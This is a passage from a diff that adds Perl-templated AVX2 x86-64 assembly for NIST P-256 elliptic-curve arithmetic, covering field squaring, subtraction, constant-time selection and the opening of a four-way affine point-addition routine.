+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $OVERFLOW
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	32*7(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC6, $ACC5
+	vpaddq		$T0, $ACC7, $ACC6
+	vpmuludq	32*8(%rax), $Y, $ACC7
+
+	dec	$itr
+	jnz	.Lavx2_mul_by1_x4_loop
+
+	ret
+.size	avx2_mul_by1_x4,.-avx2_mul_by1_x4
+
+################################################################################
+# void avx2_sqr_x4(void* RESULTx4, void *Ax4, void *Bx4);
+.type	avx2_sqr_x4,\@abi-omnipotent
+.align	32
+avx2_sqr_x4:
+	lea		.LAVX2_POLY(%rip), %rax
+
+	vmovdqa		32*7(%rax), %ymm14
+	vmovdqa		32*8(%rax), %ymm15
+
+	vmovdqa		32*0($a_ptr), $B
+	vmovdqa		32*1($a_ptr), $ACC1
+	vmovdqa		32*2($a_ptr), $ACC2
+	vmovdqa		32*3($a_ptr), $ACC3
+	vmovdqa		32*4($a_ptr), $ACC4
+	vmovdqa		32*5($a_ptr), $ACC5
+	vmovdqa		32*6($a_ptr), $ACC6
+	vmovdqa		32*7($a_ptr), $ACC7
+	vpaddq		$ACC1, $ACC1, $ACC1	# 2*$ACC0..7
+	vmovdqa		32*8($a_ptr), $ACC8
+	vpaddq		$ACC2, $ACC2, $ACC2
+	vmovdqa		$ACC1, 32*0(%rcx)
+	vpaddq		$ACC3, $ACC3, $ACC3
+	vmovdqa		$ACC2, 32*1(%rcx)
+	vpaddq		$ACC4, $ACC4, $ACC4
+	vmovdqa		$ACC3, 32*2(%rcx)
+	vpaddq		$ACC5, $ACC5, $ACC5
+	vmovdqa		$ACC4, 32*3(%rcx)
+	vpaddq		$ACC6, $ACC6, $ACC6
+	vmovdqa		$ACC5, 32*4(%rcx)
+	vpaddq		$ACC7, $ACC7, $ACC7
+	vmovdqa		$ACC6, 32*5(%rcx)
+	vpaddq		$ACC8, $ACC8, $ACC8
+	vmovdqa		$ACC7, 32*6(%rcx)
+	vmovdqa		$ACC8, 32*7(%rcx)
+
+	#itr		1
+	vpmuludq	$B, $B, $ACC0
+	vpmuludq	$B, $ACC1, $ACC1
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpmuludq	$B, $ACC2, $ACC2
+	vpmuludq	$B, $ACC3, $ACC3
+	vpmuludq	$B, $ACC4, $ACC4
+	vpmuludq	$B, $ACC5, $ACC5
+	vpmuludq	$B, $ACC6, $ACC6
+	 vpmuludq	$AND_MASK, $Y, $T0
+	vpmuludq	$B, $ACC7, $ACC7
+	vpmuludq	$B, $ACC8, $ACC8
+	 vmovdqa	32*1($a_ptr), $B
+
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		2
+	vpmuludq	$B, $B, $OVERFLOW
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpmuludq	32*1(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC1, $ACC1
+	vpmuludq	32*2(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC2
+	vpmuludq	32*3(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC3, $ACC3
+	vpmuludq	32*4(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC4, $ACC4
+	vpmuludq	32*5(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC5, $ACC5
+	vpmuludq	32*6(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*2($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		3
+	vpmuludq	$B, $B, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpmuludq	32*2(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC2
+	vpmuludq	32*3(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC3, $ACC3
+	vpmuludq	32*4(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC4, $ACC4
+	vpmuludq	32*5(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC5, $ACC5
+	vpmuludq	32*6(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*3($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		4
+	vpmuludq	$B, $B, $OVERFLOW
+	vpmuludq	32*3(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC3, $ACC3
+	vpmuludq	32*4(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC4, $ACC4
+	vpmuludq	32*5(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC5, $ACC5
+	vpmuludq	32*6(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*4($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		5
+	vpmuludq	$B, $B, $T0
+	vpmuludq	32*4(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC4, $ACC4
+	vpmuludq	32*5(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC5, $ACC5
+	vpmuludq	32*6(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*5($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3+.LAVX2_POLY(%rip), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		6
+	vpmuludq	$B, $B, $OVERFLOW
+	vpmuludq	32*5(%rcx), $B, $T0
+	vpaddq		$OVERFLOW, $ACC5, $ACC5
+	vpmuludq	32*6(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*6($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		7
+	vpmuludq	$B, $B, $T0
+	vpmuludq	32*6(%rcx), $B, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC6
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*7($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		8
+	vpmuludq	$B, $B, $OVERFLOW
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	 vpaddq		$OVERFLOW, $ACC7, $ACC7
+	 vpmuludq	32*7(%rcx), $B, $ACC8
+	 vmovdqa	32*8($a_ptr), $B
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	 vpand		$AND_MASK, $ACC0, $Y
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	#itr		9
+	vpmuludq	$B, $B, $ACC8
+
+	vpmuludq	$AND_MASK, $Y, $T0
+	vpaddq		$T0, $ACC0, $OVERFLOW
+	vpsrlq		$digit_size, $OVERFLOW, $OVERFLOW
+	vpaddq		$T0, $ACC1, $ACC0
+	vpaddq		$T0, $ACC2, $ACC1
+	vpmuludq	32*3(%rax), $Y, $T0
+	vpaddq		$OVERFLOW, $ACC0, $ACC0
+	vpaddq		$T0, $ACC3, $ACC2
+	vmovdqa		$ACC4, $ACC3
+	vpsllq		\$18, $Y, $T0
+	vmovdqa		$ACC5, $ACC4
+	vpmuludq	%ymm14, $Y, $OVERFLOW
+	vpaddq		$T0, $ACC6, $ACC5
+	vpmuludq	%ymm15, $Y, $T0
+	vpaddq		$OVERFLOW, $ACC7, $ACC6
+	vpaddq		$T0, $ACC8, $ACC7
+
+	vpxor		$ACC8, $ACC8, $ACC8
+
+	ret
+.size	avx2_sqr_x4,.-avx2_sqr_x4
+
+################################################################################
+# void avx2_sub_x4(void* RESULTx4, void *Ax4, void *Bx4);
+.type	avx2_sub_x4,\@abi-omnipotent
+.align	32
+avx2_sub_x4:
+	vmovdqa	32*0($a_ptr), $ACC0
+	lea	160($a_ptr), $a_ptr
+	lea	.LAVX2_POLY_x8+128(%rip), %rax
+	lea	128($b_ptr), $b_ptr
+	vmovdqa	32*1-160($a_ptr), $ACC1
+	vmovdqa	32*2-160($a_ptr), $ACC2
+	vmovdqa	32*3-160($a_ptr), $ACC3
+	vmovdqa	32*4-160($a_ptr), $ACC4
+	vmovdqa	32*5-160($a_ptr), $ACC5
+	vmovdqa	32*6-160($a_ptr), $ACC6
+	vmovdqa	32*7-160($a_ptr), $ACC7
+	vmovdqa	32*8-160($a_ptr), $ACC8
+
+	vpaddq	32*0-128(%rax), $ACC0, $ACC0
+	vpaddq	32*1-128(%rax), $ACC1, $ACC1
+	vpaddq	32*2-128(%rax), $ACC2, $ACC2
+	vpaddq	32*3-128(%rax), $ACC3, $ACC3
+	vpaddq	32*4-128(%rax), $ACC4, $ACC4
+	vpaddq	32*5-128(%rax), $ACC5, $ACC5
+	vpaddq	32*6-128(%rax), $ACC6, $ACC6
+	vpaddq	32*7-128(%rax), $ACC7, $ACC7
+	vpaddq	32*8-128(%rax), $ACC8, $ACC8
+
+	vpsubq	32*0-128($b_ptr), $ACC0, $ACC0
+	vpsubq	32*1-128($b_ptr), $ACC1, $ACC1
+	vpsubq	32*2-128($b_ptr), $ACC2, $ACC2
+	vpsubq	32*3-128($b_ptr), $ACC3, $ACC3
+	vpsubq	32*4-128($b_ptr), $ACC4, $ACC4
+	vpsubq	32*5-128($b_ptr), $ACC5, $ACC5
+	vpsubq	32*6-128($b_ptr), $ACC6, $ACC6
+	vpsubq	32*7-128($b_ptr), $ACC7, $ACC7
+	vpsubq	32*8-128($b_ptr), $ACC8, $ACC8
+
+	ret
+.size	avx2_sub_x4,.-avx2_sub_x4
+
+.type	avx2_select_n_store,\@abi-omnipotent
+.align	32
+avx2_select_n_store:
+	vmovdqa	`8+32*9*8`(%rsp), $Y
+	vpor	`8+32*9*8+32`(%rsp), $Y, $Y
+
+	vpandn	$ACC0, $Y, $ACC0
+	vpandn	$ACC1, $Y, $ACC1
+	vpandn	$ACC2, $Y, $ACC2
+	vpandn	$ACC3, $Y, $ACC3
+	vpandn	$ACC4, $Y, $ACC4
+	vpandn	$ACC5, $Y, $ACC5
+	vpandn	$ACC6, $Y, $ACC6
+	vmovdqa	`8+32*9*8+32`(%rsp), $B
+	vpandn	$ACC7, $Y, $ACC7
+	vpandn	`8+32*9*8`(%rsp), $B, $B
+	vpandn	$ACC8, $Y, $ACC8
+
+	vpand	32*0(%rsi), $B, $T0
+	lea	160(%rsi), %rax
+	vpand	32*1(%rsi), $B, $Y
+	vpxor	$T0, $ACC0, $ACC0
+	vpand	32*2(%rsi), $B, $T0
+	vpxor	$Y, $ACC1, $ACC1
+	vpand	32*3(%rsi), $B, $Y
+	vpxor	$T0, $ACC2, $ACC2
+	vpand	32*4-160(%rax), $B, $T0
+	vpxor	$Y, $ACC3, $ACC3
+	vpand	32*5-160(%rax), $B, $Y
+	vpxor	$T0, $ACC4, $ACC4
+	vpand	32*6-160(%rax), $B, $T0
+	vpxor	$Y, $ACC5, $ACC5
+	vpand	32*7-160(%rax), $B, $Y
+	vpxor	$T0, $ACC6, $ACC6
+	vpand	32*8-160(%rax), $B, $T0
+	vmovdqa	`8+32*9*8+32`(%rsp), $B
+	vpxor	$Y, $ACC7, $ACC7
+
+	vpand	32*0(%rdx), $B, $Y
+	lea	160(%rdx), %rax
+	vpxor	$T0, $ACC8, $ACC8
+	vpand	32*1(%rdx), $B, $T0
+	vpxor	$Y, $ACC0, $ACC0
+	vpand	32*2(%rdx), $B, $Y
+	vpxor	$T0, $ACC1, $ACC1
+	vpand	32*3(%rdx), $B, $T0
+	vpxor	$Y, $ACC2, $ACC2
+	vpand	32*4-160(%rax), $B, $Y
+	vpxor	$T0, $ACC3, $ACC3
+	vpand	32*5-160(%rax), $B, $T0
+	vpxor	$Y, $ACC4, $ACC4
+	vpand	32*6-160(%rax), $B, $Y
+	vpxor	$T0, $ACC5, $ACC5
+	vpand	32*7-160(%rax), $B, $T0
+	vpxor	$Y, $ACC6, $ACC6
+	vpand	32*8-160(%rax), $B, $Y
+	vpxor	$T0, $ACC7, $ACC7
+	vpxor	$Y, $ACC8, $ACC8
+	`&STORE`
+
+	ret
+.size	avx2_select_n_store,.-avx2_select_n_store
+___
+$code.=<<___	if (0);				# inlined
+################################################################################
+# void avx2_mul_by2_x4(void* RESULTx4, void *Ax4);
+.type	avx2_mul_by2_x4,\@abi-omnipotent
+.align	32
+avx2_mul_by2_x4:
+	vmovdqa	32*0($a_ptr), $ACC0
+	lea	160($a_ptr), %rax
+	vmovdqa	32*1($a_ptr), $ACC1
+	vmovdqa	32*2($a_ptr), $ACC2
+	vmovdqa	32*3($a_ptr), $ACC3
+	vmovdqa	32*4-160(%rax), $ACC4
+	vmovdqa	32*5-160(%rax), $ACC5
+	vmovdqa	32*6-160(%rax), $ACC6
+	vmovdqa	32*7-160(%rax), $ACC7
+	vmovdqa	32*8-160(%rax), $ACC8
+
+	vpaddq	$ACC0, $ACC0, $ACC0
+	vpaddq	$ACC1, $ACC1, $ACC1
+	vpaddq	$ACC2, $ACC2, $ACC2
+	vpaddq	$ACC3, $ACC3, $ACC3
+	vpaddq	$ACC4, $ACC4, $ACC4
+	vpaddq	$ACC5, $ACC5, $ACC5
+	vpaddq	$ACC6, $ACC6, $ACC6
+	vpaddq	$ACC7, $ACC7, $ACC7
+	vpaddq	$ACC8, $ACC8, $ACC8
+
+	ret
+.size	avx2_mul_by2_x4,.-avx2_mul_by2_x4
+___
+my ($r_ptr_in,$a_ptr_in,$b_ptr_in)=("%rdi","%rsi","%rdx");
+my ($r_ptr,$a_ptr,$b_ptr)=("%r8","%r9","%r10");
+
+$code.=<<___;
+################################################################################
+# void ecp_nistz256_avx2_point_add_affine_x4(void* RESULTx4, void *Ax4, void *Bx4);
+.globl	ecp_nistz256_avx2_point_add_affine_x4
+.type	ecp_nistz256_avx2_point_add_affine_x4,\@function,3
+.align	32
+ecp_nistz256_avx2_point_add_affine_x4:
+	mov	%rsp, %rax
+	push    %rbp
+	vzeroupper
+___
+$code.=<<___	if ($win64);
+	lea	-16*10(%rsp), %rsp
+	vmovaps	%xmm6, -8-16*10(%rax)
+	vmovaps	%xmm7, -8-16*9(%rax)
+	vmovaps	%xmm8, -8-16*8(%rax)
+	vmovaps	%xmm9, -8-16*7(%rax)
+	vmovaps	%xmm10, -8-16*6(%rax)
+	vmovaps	%xmm11, -8-16*5(%rax)
+	vmovaps	%xmm12, -8-16*4(%rax)
+	vmovaps	%xmm13, -8-16*3(%rax)
+	vmovaps	%xmm14, -8-16*2(%rax)
+	vmovaps	%xmm15, -8-16*1(%rax)
+___
+$code.=<<___;
+	lea	-8(%rax), %rbp
+
+# Result + 32*0 = Result.X
+# Result + 32*9 = Result.Y
+# Result + 32*18 = Result.Z
+
+# A + 32*0 = A.X
+# A + 32*9 = A.Y
+# A + 32*18 = A.Z
+
+# B + 32*0 = B.X
+# B + 32*9 = B.Y
+
+	sub	\$`32*9*8+32*2+32*8`, %rsp
+	and	\$-64, %rsp
+
+	mov	$r_ptr_in, $r_ptr
+	mov	$a_ptr_in, $a_ptr
+	mov	$b_ptr_in, $b_ptr
+
+	vmovdqa	32*0($a_ptr_in), %ymm0
+	vmovdqa	.LAVX2_AND_MASK(%rip), $AND_MASK
+	vpxor	%ymm1, %ymm1, %ymm1
+	lea	256($a_ptr_in), %rax		# size optimization
+	vpor	32*1($a_ptr_in), %ymm0, %ymm0
+	vpor	32*2($a_ptr_in), %ymm0, %ymm0
+	vpor	32*3($a_ptr_in), %ymm0, %ymm0
+	vpor	32*4-256(%rax), %ymm0, %ymm0
+	lea	256(%rax), %rcx			# size optimization
+	vpor	32*5-256(%rax), %ymm0, %ymm0
+	vpor	32*6-256(%rax), %ymm0, %ymm0
+	vpor	32*7-256(%rax), %ymm0, %ymm0
+	vpor	32*8-256(%rax), %ymm0, %ymm0
+	vpor	32*9-256(%rax), %ymm0, %ymm0
+	vpor	32*10-256(%rax), %ymm0, %ymm0
+	vpor	32*11-256(%rax), %ymm0, %ymm0
+	vpor	32*12-512(%rcx), %ymm0, %ymm0
+	vpor	32*13-512(%rcx), %ymm0, %ymm0
+	vpor	32*14-512(%rcx), %ymm0, %ymm0
+	vpor	32*15-512(%rcx), %ymm0, %ymm0
+	vpor	32*16-512(%rcx), %ymm0, %ymm0
+	vpor	32*17-512(%rcx), %ymm0, %ymm0
+	vpcmpeqq %ymm1, %ymm0, %ymm0
+	vmovdqa	%ymm0, `32*9*8`(%rsp)
+
+	vpxor	%ymm1, %ymm1, %ymm1
+	vmovdqa	32*0($b_ptr), %ymm0
+	lea	256($b_ptr), %rax		# size optimization
+	vpor	32*1($b_ptr), %ymm0, %ymm0
+	vpor	32*2($b_ptr), %ymm0, %ymm0
+	vpor	32*3($b_ptr), %ymm0, %ymm0
+	vpor	32*4-256(%rax), %ymm0, %ymm0
+	lea	256(%rax), %rcx			# size optimization
+	vpor	32*5-256(%rax), %ymm0, %ymm0
+	vpor	32*6-256(%rax), %ymm0, %ymm0
+	vpor	32*7-256(%rax), %ymm0, %ymm0
+	vpor	32*8-256(%rax), %ymm0, %ymm0
+	vpor	32*9-256(%rax), %ymm0, %ymm0
+	vpor	32*10-256(%rax), %ymm0, %ymm0
+	vpor	32*11-256(%rax), %ymm0, %ymm0
+	vpor	32*12-512(%rcx), %ymm0, %ymm0
+	vpor	32*13-512(%rcx), %ymm0, %ymm0
+	vpor	32*14-512(%rcx), %ymm0, %ymm0
+	vpor	32*15-512(%rcx), %ymm0, %ymm0
+	vpor	32*16-512(%rcx), %ymm0, %ymm0
+	vpor	32*17-512(%rcx), %ymm0, %ymm0
+	vpcmpeqq %ymm1, %ymm0, %ymm0
+	vmovdqa	%ymm0, `32*9*8+32`(%rsp)
+
+	#	Z1^2 = Z1*Z1
+	lea	`32*9*2`($a_ptr), %rsi
+	lea	`32*9*2`(%rsp), %rdi
+	lea	`32*9*8+32*2`(%rsp), %rcx	# temporary vector
+	call	avx2_sqr_x4
+	call	avx2_normalize_n_store
+
+	#	U2 = X2*Z1^2
+	lea	`32*9*0`($b_ptr), %rsi
+	lea	`32*9*2`(%rsp), %rdx
+	lea	`32*9*0`(%rsp), %rdi
+	call	avx2_mul_x4
+	#call	avx2_normalize
+	`&STORE`
+
+	#	S2 = Z1*Z1^2 = Z1^3
+	lea	`32*9*2`($a_ptr), %rsi
+	lea	`32*9*2`(%rsp), %rdx
+	lea	`32*9*1`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#	S2 = S2*Y2 = Y2*Z1^3
+	lea	`32*9*1`($b_ptr), %rsi
+	lea	`32*9*1`(%rsp), %rdx
+	lea	`32*9*1`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#	H = U2 - U1 = U2 - X1
+	lea	`32*9*0`(%rsp), %rsi
+	lea	`32*9*0`($a_ptr), %rdx
+	lea	`32*9*3`(%rsp), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize_n_store
+
+	#	R = S2 - S1 = S2 - Y1
+	lea	`32*9*1`(%rsp), %rsi
+	lea	`32*9*1`($a_ptr), %rdx
+	lea	`32*9*4`(%rsp), %rdi
+	call	avx2_sub_x4
+	call	avx2_normalize_n_store
+
+	#	Z3 = H*Z1*Z2
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*2`($a_ptr), %rdx
+	lea	`32*9*2`($r_ptr), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize
+
+	lea	.LONE(%rip), %rsi
+	lea	`32*9*2`($a_ptr), %rdx
+	call	avx2_select_n_store
+
+	#	R^2 = R^2
+	lea	`32*9*4`(%rsp), %rsi
+	lea	`32*9*6`(%rsp), %rdi
+	lea	`32*9*8+32*2`(%rsp), %rcx	# temporary vector
+	call	avx2_sqr_x4
+	call	avx2_normalize_n_store
+
+	#	H^2 = H^2
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*5`(%rsp), %rdi
+	call	avx2_sqr_x4
+	call	avx2_normalize_n_store
+
+	#	H^3 = H^2*H
+	lea	`32*9*3`(%rsp), %rsi
+	lea	`32*9*5`(%rsp), %rdx
+	lea	`32*9*7`(%rsp), %rdi
+	call	avx2_mul_x4
+	call	avx2_normalize_n_store
+
+	#	U2 = U1*H^2
+	lea	`32*9*0`($a_ptr), %rsi
+	lea	`32*9*5`(%rsp), %rdx
+	lea	`32*9*0`(%rsp), %rdi
+	call	avx2_mul_x4
+	#call	avx2_normalize
+	`&STORE`
+
+	#	Hsqr = U2*2
+	#lea	32*9*0(%rsp), %rsi
+	#lea	32*9*5(%rsp), %rdi
+	#call	avx2_mul_by2_x4
+
+	vpaddq	$ACC0, $ACC0, $ACC0	# inlined avx2_mul_by2_x4
+	lea	`32*9*5`(%rsp), %rdi
+	vpaddq	$ACC1, $ACC1, $ACC1
+	vpaddq	$ACC2, $ACC2, $ACC2
+	vpaddq	$ACC3, $ACC3, $ACC3
+	vpaddq	$ACC4, $ACC4, $ACC4
+	vpaddq	$ACC5, $ACC5, $ACC5
+	vpaddq	$ACC6, $ACC6, $ACC6
+	vpaddq	$ACC7, $ACC7, $ACC7
+	vpaddq	$ACC8, $ACC8, $ACC8
+	call	avx2_normalize_n_store
+
+	#	X3 = R^2 - H^3
+	#lea	32*9*6(%rsp), %rsi
+	#lea	32*9*7(%rsp), %rdx
+	#lea	32*9*5(%rsp), %rcx
+	#lea	32*9*0($r_ptr), %rdi
+	#call	avx2_sub_x4
+	#NORMALIZE
+	#STORE
+
+	#	X3 = X3 - U2*2
+	#lea	32*9*0($r_ptr), %rsi
+	#lea	32*9*0($r_ptr), %rdi
+	#call	avx2_sub_x4
+	#NORMALIZE
+	#STORE
+
+	lea	`32*9*6+128`(%rsp), %rsi
+	lea	.LAVX2_POLY_x2+128(%rip), %rax
+	lea	`32*9*7+128`(%rsp), %rdx
+	lea	`32*9*5+128`(%rsp), %rcx
+	lea	`32*9*0`($r_ptr), %rdi
+
+	vmovdqa	32*0-128(%rsi), $ACC0
+	vmovdqa	32*1-128(%rsi), $ACC1
+	vmovdqa	32*2-128(%rsi), $ACC2
+	vmovdqa	32*3-128(%rsi), $ACC3
+	vmovdqa	32*4-128(%rsi), $ACC4
+	vmovdqa	32*5-128(%rsi), $ACC5
+	vmovdqa	32*6-128(%rsi), $ACC6
+	vmovdqa	32*7-128(%rsi), $ACC7
+	vmovdqa	32*8-128(%rsi), $ACC8
+
+	vpaddq	32*0-128(%rax), $ACC0, $ACC0
+	vpaddq	32*1-128(%rax), $ACC1, $ACC1
+	vpaddq	32*2-128(%rax), $ACC2, $ACC2
+	vpaddq	32*3-128(%rax), $ACC3, $ACC3
+	vpaddq	32*4-128(%rax), $ACC4, $ACC4
+	vpaddq	32*5-128(%rax), $ACC5, $ACC5
+	vpaddq	32*6-128(%rax), $ACC6, $ACC6
+	vpaddq	32*7-128(%rax), $ACC7, $ACC7
+	vpaddq	32*8-128(%rax), $ACC8, $ACC8
+
+	vpsubq	32*0-128(%rdx), $ACC0, $ACC0
